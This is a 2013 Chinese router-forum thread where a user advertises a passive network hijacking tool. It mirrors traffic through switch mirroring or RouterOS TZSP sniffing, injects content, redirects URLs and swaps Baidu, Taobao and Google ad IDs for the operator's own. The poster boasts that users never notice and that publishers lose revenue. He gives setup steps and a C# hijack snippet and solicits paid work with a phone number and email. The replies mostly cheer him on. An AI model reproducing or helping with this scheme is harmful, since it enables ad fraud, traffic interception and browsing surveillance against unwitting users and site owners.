交流 › RouterOS › 旁路劫持程序（非ROS版、内网预览版）[网页内容劫持替换，Url劫持，各种广告联盟劫持]

sone 发表于 2013-6-5 03:17:36

旁路劫持程序（非ROS版、内网预览版）[网页内容劫持替换，Url劫持，各种广告联盟劫持]

本帖最后由 sone 于 2013-6-5 19:50 编辑



需要.NET2.0！



只能在Windows 2003、Windows 2008系统上运行，非服务器系统无法运行。
将config.ini的SnifferListenIP配置键值改为本机IP。

系统可以完全不依靠routeros！！！可用于没有routeros环境的网络，只要交换机有镜像、分光功能或者数据包能到达服务器就行！！！
可用于跨网际环境，可用于城域网和骨干劫持。

如果是交换机镜像流量，直接镜像到这台服务器就行了。

如果是ROS（ROS Sniffer性能底下，不建议使用），在ROS上使用tzsp协议镜像流量，就是Packet Sniffer的那个功能。如果不会看下面的。

在Winbox里面找到Tool->Packet Sniffer。点击第一个标签（Packet），点击Settings，选择第一个标签（General）在Interface里面找到选择内网的网卡，如果有多个内网网卡就选择all。然后点击第二个标签（Streaming），将两个复选框都选中，然后在Server：里面填写上服务器的IP，就是config.ini中SnifferListenIP值。然后Apply，然后Start。



之后，在这个内网下面的任何机器访问任何网页都会被添加?&silmoon这个参数看到了没？

hijackingServer.exe是所有都被追加了?&silmoon参数的。
hijackingServer2.exe是所有都被直接劫持某些文字的！
hijackingServer3.exe是百度搜索silmoon的时候才会被劫持的演示

三个程序每次只可以开一个，大家可以挨个打开看一下。谢谢围观。

这是一个演示版本，这是旁路劫持版本的劫持，不影响网络性能，就算程序死了也没事儿，死了最多就是无法劫持了，只是需要镜像一份流量给服务器，如果是高版本的ros可以只把tcp 80 上行流量镜像给服务器。
理论上可以做任何劫持，包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID，或者劫持百度搜索的某些关键字，更改各种广告框架，哈哈，或者记录任何浏览日志记录。

和老大的东西不一样在于，我这个不是加广告，而是替换所有已有网页上的各种广告，把广告的id和帐号都替换成自己的！！！做到用户神不知鬼不觉，不影响网页样式，不影响用户体验，只是侵害了网站广告发布商

如有需求联系我。接受技术合作。

补充内容 (2014-4-14 01:59):
有很多人问我联系方式，邮箱：sone(a)silmoon.com

补充内容 (2014-4-14 02:00):
也可以短信联系我：15650112341
邮箱：sone(a)silmoon.com

打酱油 发表于 2013-6-5 03:26:33

老大会找你算账的。

fyfal 发表于 2013-6-5 12:40:02

明显抢生意啊 哈哈

fuzhend 发表于 2013-6-5 12:59:17

技术活值得顶顶

luokaichuang 发表于 2013-6-5 14:34:40

碉堡了，这个东西如果真如楼主所说。价值不低

puding 发表于 2013-6-5 15:19:13

这个真心要顶一下。

9939781 发表于 2013-6-5 15:27:06

本帖最后由 9939781 于 2013-6-5 15:28 编辑

直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID
只是网页内容替换光靠ROS无法完成。

sone 发表于 2013-6-5 17:10:33

9939781 发表于 2013-6-5 15:27 static/image/common/back.gif
直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID
只 ...

网页内容理论上也可以做到替换，不过只针对无用户会话的页面，主要是判断host和url这部完全是自己用代码写的，可控性更高。

      public void HijackEntry(byte[] buffer, int len, string host, string url)
      {
            if (url.Contains("wd=silmoon"))
            {
                Console.ForegroundColor = ConsoleColor.Red;

                Console.WriteLine("http://" + host + url);
                callHijack(buffer, len, host, url);
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("http://" + host + url);
            }
      }

981398 发表于 2013-6-5 17:36:25

本帖最后由 981398 于 2013-6-5 22:09 编辑

技术活，要力顶
:o-
老大会找你算账的
不知道会不会删帖！

qile 发表于 2013-6-6 22:52:09

9939781 发表于 2013-6-5 15:27 static/image/common/back.gif
直接用ROS就可以做到精确URL跳转了。包括替换百度联盟号“tn=”，替换淘宝客pid，替换谷歌广告发布商ID
只 ...

这个只能实现，能否举例说明

9939781 发表于 2013-6-6 22:56:23

qile 发表于 2013-6-6 22:52 static/image/common/back.gif
这个只能实现，能否举例说明

成品说明一切
http://www.cat-home.org/?action=show&id=122

qile 发表于 2013-6-7 09:12:50

9939781 发表于 2013-6-6 22:56 static/image/common/back.gif
成品说明一切
http://www.cat-home.org/?action=show&id=122

你那个 能实现替换淘宝客代码，百度联盟代码吗？

9939781 发表于 2013-6-7 09:34:17

本帖最后由 9939781 于 2013-6-7 09:41 编辑

qile 发表于 2013-6-7 09:12
你那个 能实现替换淘宝客代码，百度联盟代码吗？

只要是基于url的都可以。不过我只搞导航和搜索增值，其他增值不搞。产品内容已经介绍得很清楚了。什么百度，搜狗 tao123 都可以实现定向只劫持有增值id的连接。也可以劫持不带增值id的导航搜索。

youshu 发表于 2013-6-7 12:22:49

这个相当可以啊！

duyang12003 发表于 2013-6-7 18:35:21

现在的广告做的很给力了，

查看完整版本: 旁路劫持程序（非ROS版、内网预览版）[网页内容劫持替换，Url劫持，各种广告联盟劫持]